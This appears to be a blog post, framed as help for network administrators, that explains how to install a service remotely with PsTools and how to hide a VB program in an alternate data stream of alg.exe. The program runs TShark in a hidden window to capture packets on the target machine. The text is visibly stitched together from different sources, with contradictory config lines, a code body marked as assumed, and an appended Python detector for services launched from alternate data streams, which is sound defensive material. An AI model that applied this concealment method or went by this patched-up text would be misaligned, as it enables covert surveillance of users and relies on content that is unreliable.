The use of TOR has indeed gathered momentum recently, much to the chagrin of network administrators who meticulously implemented measures to block access to publicly available content that doesn't comply with their policies. Today I will change sides and suggest some remedial measures for system administrators that let them still view the traffic that goes through the TOR network.
Oh, but before I delve into it: it is worth trying this yourself using the sequence of steps briefly outlined below, before I put up a video about it tomorrow. So, here we go.
You have a username (*******) and an interesting password, say 4$$h0l3, on a system whose IP address is, say, 192.168.4.19X.
1. Download PStools (http://technet.microsoft.com/en-us/sysinternals/bb896649.aspx)
//using it you will install xyNTservice on the remote computer
2. Download xyNTservice.exe (http://www.codeproject.com/kb/system/xyntservice.aspx)
//It can be made to start before you log on to the computer :)
3. Modify xyNTservice.ini
ServiceName = XYNTService
CheckProcessSeconds = 30
CommandLine = c:\winnt\system32\alg.exe:process
UserInterface = Yes
Restart = Yes
Restart = No
4. The VB 2005 application (c:\winnt\system32\alg.exe:process), which can be attached to alg.exe as an alternate data stream (ADS) and which spawns a background process, has the following code:
Private oProc As System.Diagnostics.Process
'Run process code
Dim sShellCommand As String = "C:\Program Files\Wireshark\TShark.exe"
'TShark options: -i capture interface, -w output file, -a autostop conditions
Dim sArgumentString As String = "-i " & iInterfaceID & " -w """ & sOutputFile & """ -a duration:" & lDuration & " -a files:" & lNumFiles & " -a filesize:" & lFileSize
Dim oProcInfo As New System.Diagnostics.ProcessStartInfo(sShellCommand)
With oProcInfo
    .UseShellExecute = False
    'I tried changing this to true and passing a CTRL+C
    'through a Streamwriter - but I couldn't get it to work
    .RedirectStandardInput = False
    .CreateNoWindow = True
    .WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
    .Arguments = sArgumentString
End With
oProc = System.Diagnostics.Process.Start(oProcInfo)
'Block until the process exits
oProc.WaitForExit()
'This code basically stops here until the process raises an Exited event which either happens after the specified amount of time has elapsed
'and TShark has finished doing its thing, or when the process is stopped (interrupted) by the user.
'End code block
Now - this process spawns perfectly and does everything it needs to do. If you know anything about Wireshark - the TShark process will basically run for a specified amount of time [lDuration] and then close the file it's writing. This all works perfectly.
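Another routine allows the user to kill the process early; it contains the following code:
'Interrupt process code
'Need to replace the Kill() below with a means of sending CTRL+C to oProc
If Not oProc.HasExited Then
    oProc.Kill() 'Assumed body: the original listing is cut off after the If line
End If
oProc.Close() 'Release the handle only after the process has stopped
'End code block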
Remember: the data is now being captured at the place where it originates (which TOR can't alter), in the background, and is sent to your computer in a file.
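Seen from the monitoring side, the distinctive artifact of steps 3 and 4 is a service command line that points into an alternate data stream (c:\winnt\system32\alg.exe:process). The following is an added example, not code from the original post, that flags such command lines in a service inventory; the inventory is constructed sample data, and only the XYNTService path is taken from step 3.

```python
import ntpath

# Constructed sample inventory: service name -> command line. Only the
# XYNTService entry uses the path from the post; the rest are made up.
SAMPLE_SERVICES = {
    "ALG": r"C:\WINNT\System32\alg.exe",
    "XYNTService": r"c:\winnt\system32\alg.exe:process",
    "Spooler": r'"C:\WINNT\system32\spoolsv.exe" -k print',
    "Backup": r'"C:\Program Files\Vendor\agent.exe:cfg:$DATA" /run',
    "Updater": r"C:\Tools\upd.exe --url http://updates.example:8080/feed",
}

def executable_of(command_line):
    """Return the program part of a command line (quoted or first token)."""
    cl = command_line.strip()
    if cl.startswith('"'):
        end = cl.find('"', 1)
        return cl[1:end] if end != -1 else cl[1:]
    # Unquoted paths containing spaces are cut at the first space here.
    return cl.split(None, 1)[0] if cl else ""

def stream_in_path(path):
    """Return (host_file, stream_name) if path names a named ADS, else None."""
    _drive, rest = ntpath.splitdrive(path)   # drops "C:" so its colon is ignored
    name = ntpath.basename(rest)
    if ":" not in name:
        return None
    base, stream = name.split(":", 1)
    stream_name = stream.split(":", 1)[0]    # "cfg:$DATA" -> "cfg"
    if not stream_name:                      # "file::$DATA" is the normal content
        return None
    return path[: len(path) - len(name)] + base, stream_name

def find_ads_launches(services):
    """List (service, host_file, stream) for programs started from an ADS."""
    hits = []
    for service, command_line in services.items():
        found = stream_in_path(executable_of(command_line))
        if found:
            hits.append((service, found[0], found[1]))
    return hits

if __name__ == "__main__":
    for service, host, stream in find_ads_launches(SAMPLE_SERVICES):
        print(f"{service}: runs stream '{stream}' attached to {host}")
```

Only the program path is inspected, so colons inside arguments (the URL in the Updater entry) do not trigger a hit.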
>> YOU NEVER KNOW WHERE AN OCEAN STARTS AND HOW MANY THINGS IT HAS HIDDEN INSIDE IT <<
== Check it yourself, it works smooth as silk. A boon for network administrators. I'm trying to alter the video so that I do not get sued or COC-ed at my workplace ==